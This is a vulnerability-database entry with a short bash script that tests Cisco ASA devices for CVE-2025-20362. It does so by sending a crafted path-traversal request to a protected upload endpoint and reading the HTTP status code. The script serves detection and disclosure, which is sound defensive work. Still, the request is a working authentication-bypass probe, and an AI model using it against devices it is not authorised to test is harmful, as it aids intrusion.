{"uuid": "9b4cf20c-8f3e-4626-8fdb-9a78038a672d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "title": "Script to check for vulnerable ASAs", "description": "The script below, also available at the following link, checks whether an ASA is vulnerable.\n\nhttps://gist.cnw.circl.lu/alexandre.dulaunoy/95ca6ae6259e4c8b899b916ee8b3d4a6\n\n```bash\n#!/bin/bash\n\n# CIRCL - 2025\n# Test CVE 2025-20362\n# Ref : https://attackerkb.com/topics/Szq5u0xgUX/cve-2025-20362/rapid7-analysis\n\nif [ -z \"$1\" ]; then\n  echo \"Test for CVE-2025-20362\"\n  echo \"Usage: $0 <IP>\"\n  exit 1\nfi\n\nIP=\"$1\"\n\necho \"Looking for CVE-2025-20362\"\n# Temporary OpenSSL config enabling UnsafeLegacyRenegotiation for this curl call only;\n# --path-as-is stops curl from normalising the /../ in the URL.\nresponse=$(OPENSSL_CONF=<( \n  echo -e 'openssl_conf = openssl_init\\n\\n[openssl_init]\\nssl_conf = ssl_sect\\n\\n[ssl_sect]'\n  echo -e 'system_default = system_default_sect\\n\\n[system_default_sect]\\nOptions = UnsafeLegacyRenegotiation\\n'\n  cat /etc/ssl/openssl.cnf\n) curl \"https://$IP/+CSCOU+//../+CSCOE+/files/file_action.html?mode=upload&path=foo&server=srv&sourceurl=qaz\" \\\n  -S --insecure -v -o - --path-as-is 2>&1)\n\nif echo \"$response\" | grep -q \"HTTP/1.1 404\"; then\n  echo \"Not vulnerable\"\nelif echo \"$response\" | grep -q \"HTTP/1.1 200\"; then\n  echo \"Vulnerable\"\nfi\n\n```", "description_format": "markdown", "vulnerability": "CVE-2025-20362", "creation_timestamp": "2025-10-06T15:02:58.061302+00:00", "timestamp": "2025-10-06T16:25:58.212700+00:00", "related_vulnerabilities": ["CVE-2025-20362"], "meta": [{"tags": ["vulnerability:exploitability=industrialised", "vulnerability:information=PoC"]}], "author": {"login": "sync_user", "name": "sync_user", "uuid": "4f29edb9-4c4b-44ca-b041-9b050656b6ae"}}
